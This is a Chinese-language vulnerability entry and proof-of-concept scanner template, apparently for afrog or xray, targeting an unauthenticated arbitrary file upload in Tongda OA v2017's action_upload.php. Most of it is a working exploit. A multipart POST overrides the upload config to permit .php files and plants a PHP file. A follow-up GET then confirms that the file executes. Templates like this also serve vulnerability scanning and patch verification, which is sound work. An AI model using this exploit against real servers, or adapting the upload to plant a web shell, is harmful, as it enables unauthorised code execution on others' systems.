漏洞描述
通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞
app="TDXK-通达OA"
tongda-v2017-uploadfile: 通达OA v2017 action_upload.php 任意文件上传漏洞
PoC代码[已公开]
id: tongda-v2017-uploadfile
info:
name: 通达OA v2017 action_upload.php 任意文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |
通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞
app="TDXK-通达OA"
reference:
- http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20action_upload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
set:
randstr: randomLowercase(6)
num: randomInt(1000, 10000)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /module/ueditor/php/action_upload.php?action=uploadfile
headers:
Content-Type: multipart/form-data; boundary=----------WebKitFormBoundary{{rboundary}}
body: "\
------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"CONFIG[fileFieldName]\"\r\n\
\r\n\
ffff\r\n\
------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"CONFIG[fileMaxSize]\"\r\n\
\r\n\
1000000000\r\n\
------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"CONFIG[filePathFormat]\"\r\n\
\r\n\
{{randstr}}\r\n\
------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"CONFIG[fileAllowFiles][]\"\r\n\
\r\n\
.php\r\n\
------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"ffff\"; filename=\"test.php\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n\
<?php echo md5({{num}});unlink(__FILE__);?>\r\n\
------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"mufile\"\r\n\
\r\n\
submit\r\n\
------------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200
r1:
request:
method: GET
path: /{{randstr}}.php
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(num))))
expression: r0() && r1()